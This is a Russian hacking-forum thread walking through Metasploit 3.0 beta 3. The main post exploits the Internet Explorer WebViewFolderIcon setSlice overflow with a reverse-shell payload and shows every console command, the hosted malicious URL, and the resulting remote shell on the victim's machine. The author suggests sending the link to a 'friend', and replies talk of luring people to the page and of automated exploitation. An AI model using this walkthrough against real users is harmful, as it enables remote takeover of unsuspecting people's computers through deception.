PDA

Просмотр полной версии : Учимся юзать консоль MSF 3.0 beta 3 (или Metasploit Framework часть 3)


-=lebed=-
06.12.2006, 18:20
Metasploit Framework 3.0

Предисловие:

Во-первых, кто не знает что это такое рекомендую к прочтению статьи:
Metasploit Framework для новичков (http://forum.antichat.ru/thread21599.html)
Раздача Троя (Или Metasploit Framework часть 2) (http://forum.antichat.ru/thread21686.html)
Metasploit Framework v. 3.0 (описание) (http://forum.antichat.ru/thread28128.html)

Официально доступна уже третья beta пакета Metasploit Framework 3.0
Для windows качаем тут (http://metasploit.com/projects/Framework/msf3/download.html?Release=framework-3.0-beta-3-svn.exe)

1. Несколько главных отличий (на беглый взгляд) от версии 2.7

а) Во-первых появилась мультизадачность - ломать можно сразу несколько клиентов одновременно, используя разные сплоиты и начинки
б) Изменились названия сплоитов и они разложены по папкам (ИМХО так появился хоть какой-то порядок и определить для чего тот или иной сплоит предназначен можно по пути где он лежит, что не может не радовать, минус, что имя сплоита теперь приходится набирать с его путём, однако копи-пасте никто не отменял, будем использовать Cntr+insert и Shift+insert)
в) Появился Meterpreter - расширенная многофункциональная начинка (полезный груз), которая может быть динамически расширена во время выполнения. В нормальных условиях, это означает, что это обеспечивает Вас основной оболочкой и позволяет Вам добавлять новые особенности к ней по мере необходимости. Пожалуйста обратитесь к Meterpreter документации для глубокого описания того, как это работает и что Вы можете сделать с этим. Meterpreter руководство может быть найдено в подкаталоге docs Framework.
г) Убрали интерпретатор Perl, заменили его на интерпретатор Руби (сложно сказать почему, но ИМХО, это было сделано именно из-за особенностей этого интерпретатора, язык обладает независимой от операционной системы реализацией многопоточности - поэтому его и использовали. Соответственно все сплоиты переписали на Руби. (они имеют расширение rb)
д) Дольше стала грузится и медленней работать консоль (оно и понятно - интерпретатор Ruby, эмулятор cygwin, больше сплоитов и начинок). Да к тому же у меня всё это хозяйство стоит на VirtualPC в гостевой ОС - WIN XP SP2.

Пункты будут добавляться по мере нахождение важных отличий...

2. Использование.
Ну тут всё точно также как и в 2.7, за исключение одного ньюанса! Появилось понятие сессий или Jobs подругому (понятной инфы по этому нет даже на офиц. сайте)
Запускаем пакет (консоль msf).


Please use MSFUpdate to obtain the latest patches and exploits!


Starting the Metasploit Framework...


_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|



=[ msf v3.0-beta-dev
+ -- --=[ 116 exploits - 99 payloads
+ -- --=[ 17 encoders - 4 nops
=[ 17 aux
msf >


баннер консоли показывает что в пакете 116 эксплоитов и 99 начинок (полезного груза), 17 кодеров, 4 только для указанных целей
командуем help - посмотрим что есть из комманд у нас...

msf > help

Core Commands
=============

Command Description
------- -----------
?_______________Help menu (вывод этого хелпа на экран)
back____________Move back from the current context (переместиться назад от текущего контекста)
banner__________Display an awesome metasploit banner (выводит на экран баннер метасплоита (то что выводится в начале))
cd______________Change the current working directory (смена рабочей директории)
exit_____________Exit the console (выход из консоли)
help_____________Help menu (вывод этого хелпа на экран)
info_____________Displays information about one or more module (Вывести на экран информацию об одном или нескольких модулях)
irb______________Drop into irb scripting mode (Упасть (перейти) в irb скриптинг режим)
jobs_____________Displays and manages jobs (Отобразить и управлять задачами)
load_____________Load a framework plugin (Загрузить плагин фрамворка)
loadpath__________Searches for and loads modules from a path (Поиск путей загруженных модулей)
quit______________Exit the console (Выход из консоли)
route_____________Route traffic through a session (Маршрут траффа через сеанс)
save_____________Saves the active datastores (Сохранить активную историю данных)
sessions__________Dump session listings and display information about sessions (Дампит листинг сессий и выводит информацию о них)
set______________Sets a variable to a value (Устанавливает значение переменной)
setg_____________Sets a global variable to a value (Устанавливает значение глобальной переменной)
show____________Displays modules of a given type, or all modules (Выводит на экран модули по типу или все модули)
sleep____________Do nothing for the specified number of seconds (Бездействие столько-то секунд)
unload___________Unload a framework plugin (Выгрузить плагин фрамворка)
unset____________Unsets one or more variables (Сбросить одну или более переменных)
unsetg___________Unsets one or more global variables (Сбросить одну или более глобальных переменных)
use______________Selects a module by name (Использовать (выбрать) модуль (эксплоит) по имени)
version___________Show the console library version number (Показать номер версии фрамворка и консоли)

msf >

Ага, команд стало больше! (по сравнению с версией 2.7)
затестим, так как будто мы только соскочили с версии 2.7

msf > show
Encoders
========
Name Description
---- -----------
...пропушено...

NOP Generators
==============
...пропущено...

Exploits
========
...пропущено...
(тут много разных эксплоитов)
windows /browser/webview_setslice Internet Explorer WebViewFolderIcon setSlice() Overflow
... пропущено...
Payloads
========

Name Description
---- -----------
...пропущено...
windows /shell_reverse_tcp Windows Command Shell, Reverse TCP Inline
...пропущено...
Auxiliary
=========
...пропущено...

Ну я не зря оставил только один сплоит(для свежей дыры в безопасности IE6-7) и любимую начинку - реверсшелл, так как затестим пакет именно с помощью их..
И так... go!

3. Практика применения.


msf > use windows/browser/webview_setslice
msf exploit(webview_setslice) >
- выбрали сплоит, команда use удачно выполнилась!
Посмотрим по нём инфу (рекомендую тем кто не знает что это за сплоит)

msf exploit(webview_setslice) > info

Name: Internet Explorer WebViewFolderIcon setSlice() Overflow
Version: 3783
Platform: Windows
Privileged: No
License: Metasploit Framework License v1.0

Provided by:
hdm <hdm@metasploit.com>

Available targets:
Id Name
-- ----
0 Windows XP SP0-SP2 / IE 6.0SP1 English

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 10.0.0.1 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
URIPATH no The URI to use for this exploit (default is random)

Payload information:
Space: 1024
Avoid: 1 characters

Description:
This module exploits a flaw in the WebViewFolderIcon ActiveX control
included with Windows 2000, Windows XP, and Windows 2003. This flaw
was published during the Month of Browser Bugs project (MoBB #18).

References:
http://www.osvdb.org/27110
http://www.securityfocus.com/bid/19030
http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html

msf exploit(webview_setslice) >

Прекрасно! Проверим установку переменной LHOST (по старинке, тут почему-то уже другое имя SRVHOST, ну да ладно!)

msf exploit(webview_setslice) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf exploit(webview_setslice) >
- вроде как устанавливается, дальше выбираем начинку, старый добрый реверсшелл..

msf exploit(webview_setslice) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(webview_setslice) >
всё, к сплоиту удачно "прикрутилась" полезная нагрузка - реверсшелл, осталось скомандовать exploit! СТОП! Глянем ещё раз на параметры сплоита, там мне понравилась опция URIPATH - URI - имя (наверно можно и не полный путь) вредоносной страницы web-сервера метасплоита на котором повиснет наш эксплоит с реверсшеллом, по умолчанию он случайный, ну а мы назавём к примеру так svegaya_baga

msf exploit(webview_setslice) > set URIPATH svegaya_baga
URIPATH => svegaya_baga
всё ок! присвоили значение переменной URIPATH, пора уже командовать exploit

msf exploit(webview_setslice) > exploit

Started reverse handler

Using URL: http://10.0.0.1:8080/svegaya_baga

Server started.

Exploit running as background job.
msf exploit(webview_setslice) >

Сервак поднят по адресу http://10.0.0.1:8080/svegaya_baga - тут висит наш сплоит с начинкой!
Заходим IE эксплорером по этой ссылке (я заходил с другой гостевой ОС, а вы даёте ссылку другу), сплоит на переполнение, поэтому придётся подождать некоторое время...Опс! Сообщение в консоли!

msf exploit(webview_setslice) > Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1548)

Открыта одна сессия с командной оболочкой! И что дальше делать? Где наш удалённый cmd? А вот что, жмём просто ввод, далее набираем "sessions -i 1" и мы в удалённой командной строке юзверя

msf exploit(webview_setslice) > sessions -i 1

Starting interaction with 1...

Microsoft Windows XP [‚ҐабЁп 5.1.2600]
(‘) Љ®аЇ®а*жЁп Њ*©Єа®б®дв, 1985-2001.

C:\Documents and Settings\Ђ¤¬Ё*Ёбва*в®а\ђ*Ў®зЁ© бв®«>
ну а дальше вы всё знаете... например скомандуем в консоли cmd chcp 1251 (поменяем кодовую страницу на виндовую русскую)

C:\Documents and Settings\Ђ¤¬Ё*Ёбва*в®а\ђ*Ў®зЁ© бв®«>chcp 1251
chcp 1251
’ҐЄгй*п Є®¤®ў*п бва**Ёж*: 1251

C:\Documents and Settings\Администратор\Рабочий стол> cd \
cd \

C:\>dir
dir
Том в устройстве C не имеет метки.
Серийный номер тома: 0000-ХХХХ

Содержимое папки C:\

14.07.2006 13:47 <DIR> WINNT
14.07.2006 13:55 <DIR> Documents and Settings
14.07.2006 14:04 <DIR> Program Files
14.07.2006 14:06 0 CONFIG.SYS
14.07.2006 14:06 0 AUTOEXEC.BAT
14.07.2006 14:40 <DIR> Сплоит
26.09.2006 09:20 <DIR> common
05.12.2006 14:26 139*264 hddflooder05.exe
05.12.2006 14:31 16*384 flooder.exe
05.12.2006 14:33 135*168 hddflooder.exe
05.12.2006 14:36 157*184 ICQ Flooder.exe
05.12.2006 16:18 <DIR> 1
6 файлов 448*000 байт
6 папок 15*910*240*256 байт свободно

C:\>

4. Заключение.
Вывод: вполне рабочий пакет! Можно использовать...
Дополнение от 28.12.2006: Тут на Milw0rm`e лежит видео (в разделе video, всем смотреть!) (http://www.milw0rm.com/video/watch.php?id=50)

(с) -=lebed=- Все права защищены.

-=lebed=-
06.12.2006, 18:45
Классно, добавились похожие темы по теме об компьтерных преступлениях...
Правильно, автор не несёт никакой ответствености за использование пакета в противозаконных целях, так что используя эту информацию - Вы сами несёте ответственность перед законом...

P.S. Пора это постить в закрытом разделе, тока к сожалению не могу - в MOA не взяли пока... :)

Lancellot
06.12.2006, 23:07
Никто не встречас ссылку с Metasploit Framework 3.0 только не с официального сайта а то я Dial-up и там не поддержует докачки !Если кто найдет буду благодарен!
И не с РАПИДА там тоже докачки не поддержует!
С меня ++++

-=lebed=-
07.12.2006, 00:19
Да он всего около 12 метров - качай (ИМХО докачка поддерживается) , щас выложить не могу, если только завтра - сам на диалап сижу щас...

Lancellot
07.12.2006, 00:35
С официального сайта у меня не держит докачки!Через все пробывал!
Ну если хотябы завтра!

-=lebed=-
07.12.2006, 11:59
Выложил, Скачать Metasploit Framework 3.0 beta 3 (windows) (http://lebed.ucoz.ru/php/framework-3.0-beta-3-svn.exe) (будет доступен до 7.12.2006 18:00)

G@nGsta
09.12.2006, 04:59
Hi ПиплZZZ
У меня следующая проблема:
Система Windows XP SP2, поставил Metasploit (пробовал 2 и 3 версию)
3-я просто не запускается, выдает ошибку в rxvt, а 2-я запускается но при запуске выдается очень много ошибок. Что делать? Как запустить?

cheet
09.12.2006, 11:12
у меня тоже проблема скачал третий и там нет куда писать команды а когда смотришь список процессов то cygpath.exe занимает всю оперативу. 98 % сразу скажу оперативки 512 мег. кто что посоветует сделать?

-=lebed=-
09.12.2006, 17:38
G@nGsta & cheet сколько ставил на разные компьютеры пакет (начиная с версии 2.5 и кончая 3.0 бета 3) не сталкивался с проблемой запуска пакета, у меня работают все версии даже в гостевой WIN-XP-SP2 - проблем с запуском не было, на основной системе 2 гб. памяти, гостевой отдавал 512 Мб. Вообщем пробуйте на девственно-чистой винде, ИМХО у вас что-то с самой системой...

P.S. На ноуте у меня с 512 Мб. тоже 3.0 бета 3 пашет...

cheet
09.12.2006, 18:39
ну вот поставил систему с нуля все равно не катит вроде все правильно делаю да и в консоле без этого работать могу но тут ни чего не выходит

G@nGsta
10.12.2006, 02:09
А может как-нибудь повлиять на работу Фаервол или анивирус?

-=lebed=-
10.12.2006, 20:33
А может как-нибудь повлиять на работу Фаервол или анивирус?
Файрвол влияет как и на обычные сетевые приложения (лучше включить его в режим обучения или отключить совсем), антивирус особо не влияет, если только не ломать самому себя - естественно вредоносные страницы блокирует, так как разпознаёт потенциально опасный код...

-=lebed=-
10.12.2006, 20:41
у меня тоже проблема скачал третий и там нет куда писать команды а когда смотришь список процессов то cygpath.exe занимает всю оперативу. 98 % сразу скажу оперативки 512 мег. кто что посоветует сделать?
В процессах у меня после запуска MSFConsole два процесса: 1) rxvt.exe (родительский процесс cmd.exe 1,4 мб. в памяти);
2) ruby.exe (интерпретатор Руби, 23 мб в памяти), больше нет ничего. Всё справедливо для версии пакета под Windows (у меня XP-SP2)

G@nGsta
12.12.2006, 04:09
Переустановил систему все заработало......

creative001
18.12.2006, 14:50
Вопрос! как сделать так чтобы можно было чтото скопироват в консоль.Т.е. например мне впадлу каждый раз вручную абивать длтнное название сплойта...в cmd можно правой кнопкой мыши..да и в 2.7 можно было так! Может быть можно запустить 3 3бету через cmd или еще как?

Ch3ck
18.12.2006, 15:44
Тэк, его наверно как и прошлые версии можно через браузер запускать, а не через cmd(привычнее).

-=lebed=-
20.12.2006, 03:30
Вопрос! как сделать так чтобы можно было чтото скопироват в консоль.Т.е. например мне впадлу каждый раз вручную абивать длтнное название сплойта...в cmd можно правой кнопкой мыши..да и в 2.7 можно было так! Может быть можно запустить 3 3бету через cmd или еще как?
Ctrl+ins и shift+ins никто не отменял.
P.S. Не внимательно читал статью...

MegaBits
20.12.2006, 23:32
Я все время юзаю через браузер и не парю себе мозг, хотя там и в консоли разобраться не трудно команда help и читаем.

-=lebed=-
28.12.2006, 14:15
Добывил ссылку в конце статьи на видео по Метасплоиту на Milw0rm`е, кому интересно смотрите (http://www.milw0rm.com/video/watch.php?id=50)

С начала показано как выбирают сплоит и начинку вручную (обычный случай в 2.7), потом второй вариант - используют nmap базу уязвимостей и взламывают автоматически... Это одно из главных отличий версии 3.0 от 2.7. Представляет интерес именно второй вариант - будем разбираться...

Elrio
05.01.2007, 01:37
Хорошо написал. Като поподробней к какому exploits какой shell использовать или разницы нет.

Prizrak1234
19.01.2007, 02:30
Дайте кто нить скачать 3 версию, не могу скачать с оф сайта. Ерунда какая то открывается. Выложите плз на фтп или ещё где или ilua6@mail.ru
заранее спасибо!

-=lebed=-
19.01.2007, 10:39
На: http://lebed.ucoz.ru/php/framework-3.0-beta-3-svn1.exe качай, ссылка доступна до 17:00 19.01.07

Dozer
19.01.2007, 11:48
Подскажите у кого нибудь получилось просканить уязвимости на автомате под виндой? У меня выдает ошибку при создании базы

/usr/lib/ruby/gems/1.8/gems/postgres-pr-0.4.0/lib/postgres-pr/connection.rb:138: command not found: psql -q metasploit3
Database creation complete (check for errors)

и дальше облом. Что нибудь посоветуете?

Hunter X
31.01.2007, 23:23
Подскажите, как можно изменить размер шрифта в окне Metasploit Framework. При разрешении 1280 на 1024 очень мелкий шрифт, глаза устают.

Hunter X
31.01.2007, 23:29
Hi ПиплZZZ
У меня следующая проблема:
Система Windows XP SP2, поставил Metasploit (пробовал 2 и 3 версию)
3-я просто не запускается, выдает ошибку в rxvt, а 2-я запускается но при запуске выдается очень много ошибок. Что делать? Как запустить? Сам столкнулся с подобной проблемой. Причина оказалась в Outpost Firewall Pro. Причём даже с отключённым Outpost не хотел ставиться. Только после его удаления удалось установить Metasploit. Скачал последнюю версия Outpost Firewall Pro 4.0.1007.591, с ней и ставится и работает нормально.

-=lebed=-
31.01.2007, 23:41
Подскажите, как можно изменить размер шрифта в окне Metasploit Framework. При разрешении 1280 на 1024 очень мелкий шрифт, глаза устают.
Редактируй батник запуска консоли:

@echo off

chdir bin
rxvt -title "Metasploit Framework Console" -sr -sl 2000 -fn "Lucida Console-10" -geometry 120x35 -fg gray -bg black -e bash --login -i -c /home/run_msfconsole

Поставь, например вместо 10->16, а окно сделай больше 240x70 (это в символах)
Получится так:

@echo off

chdir bin
rxvt -title "Metasploit Framework Console" -sr -sl 2000 -fn "Lucida Console-16" -geometry 240x70 -fg gray -bg black -e bash --login -i -c /home/run_msfconsole


P.S. У меня на ноуте 1280х800 (15") оптимально шрифт 14, окно 140х40 (такого хватает)

Hunter X
02.02.2007, 15:58
Кто нибудь разобрался, как использовать на автомате проверку одного компа на несколько уязвимостей, или несколько компов на одну уязвимость. Опишите Plz. Так как показано в видеофайле с последней бэттой не проходит. На этапе db_hosts что то не впорядке, появляется ошибка.

-=lebed=-
02.02.2007, 16:43
Кто нибудь разобрался, как использовать на автомате проверку одного компа на несколько уязвимостей, или несколько компов на одну уязвимость. Опишите Plz. Так как показано в видеофайле с последней бэттой не проходит. На этапе db_hosts что то не впорядке, появляется ошибка.
Да, ты прав, с 3-й бэттой, то что на видео не прокатывает - надо разбираться...

ZERO-Y
23.02.2007, 18:06
Спасибо за статю.. на самом деле, то что надо!

(P.s - ты случайно нежелаешь сделать видео по дыре в IE 6-7 (Metasplot 3.beta3) ?)
Думаю многие будут очень благодарны! =)

3DViruzZ
24.03.2007, 21:33
Для тех у кого Dial-up или недоведи господь GPRS.
Выложил прогу на ifolder, т.к. лично у меня с оффсайта докачку не поддерживает и даже непоказывает размер скачиваемого файла.
Также ссылка поможет тем, кто не знает английского языка и на оффсайте не смог прочитать лицензионное соглашение, а при этом совесть не позволила нажать кнопочку "accept" чтобы получить файл.
На ifolder'e не нужно читать и принимать лицензионных соглашений )
http://ifolder.ru/1470633

-=lebed=-
28.03.2007, 15:09
Дождались! Вчера вышел 3.0 релиз! Подробности тут: http://forum.antichat.ru/thread36568.html

AL Capone
01.04.2007, 21:36
а что вот это значит после команды sessions -i 1, [-] Invalid session identifier: 1, пробовал вместо 1 другие цифры вставлять, одно и тоже...

-=lebed=-
01.04.2007, 21:38
а что вот это значит после команды sessions -i 1, [-] Invalid session identifier: 1, пробовал вместо 1 другие цифры вставлять, одно и тоже...
Ну походу не было не одной сессии открыто... :)

AL Capone
01.04.2007, 21:43
ну я делал все попорядку как ты показывал...правда сплойт другой, набрал exploit, там было написано точно не помню, но что вроде того что он стартанул, потом вот это набрал sessions -i 1...Правильно?

-=lebed=-
01.04.2007, 21:47
Типа этого

msf exploit(имя_сплоита) > Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.2:1548)

сообщение было?

Какой версией пользуешься? релиз 3.0 или 3.0 бета 3 ?

P.S. После команды exploit, как правило поднимается сервер с вредоносной страницей, т. е туда (на него) надо ещё заманить кого-то (или самому локально зайти). :)

-=lebed=-
01.04.2007, 22:18
не было такого сообщения , и у меня не совем такой сплоит так называется windows/browser/ms06_057_webview_setslice ,версия 3,0 на знаю релиз или бета. я его вчера качнул.

про заманить я знаю :)
Ну дак пока не заманишь, никакой сессии и не будет (начинку какую заряжал ?)

AL Capone
02.04.2007, 17:25
я сделал просмот всех подходящих под этот сплоит шелл кодов, и выбрал какой-то из них.(уже не помню какой именно).С этим сплойтом мне теперь понятно.Т.е если у того кто зайдет по ссылке будет именно эта уязвимость, то все сработает, и автоматический откроется сессия.Правильно понял?
А вот еще один вопрос...Допустим я выбрал другой сплоит в котором указываешь Ip и порт удаленного компа.Как там сессия открывается?После того как я его запущу?
Ответь все по побробнее если не трудно...Заранее спасибо.

-=lebed=-
02.04.2007, 17:40
я сделал просмот всех подходящих под этот сплоит шелл кодов, и выбрал какой-то из них.(уже не помню какой именно).С этим сплойтом мне теперь понятно.Т.е если у того кто зайдет по ссылке будет именно эта уязвимость, то все сработает, и автоматический откроется сессия.Правильно понял?
А вот еще один вопрос...Допустим я выбрал другой сплоит в котором указываешь Ip и порт удаленного компа.Как там сессия открывается?После того как я его запущу?
Ответь все по побробнее если не трудно...Заранее спасибо.
После запуска удалённого эксплоита (атака на сетевые сервисы), если демон уязвим, то ты можешь получить удалённый шелл-доступ к компу (зависит от начинки). Имхо автоматом окно сессии не открывается, надо набрать sessions -i 1. Я релиз ещё подробно не смотрел, читай перевод (http://n0nerus.narod.ru/msf_manual.html) перевод официального пользовательского мана от n0ne.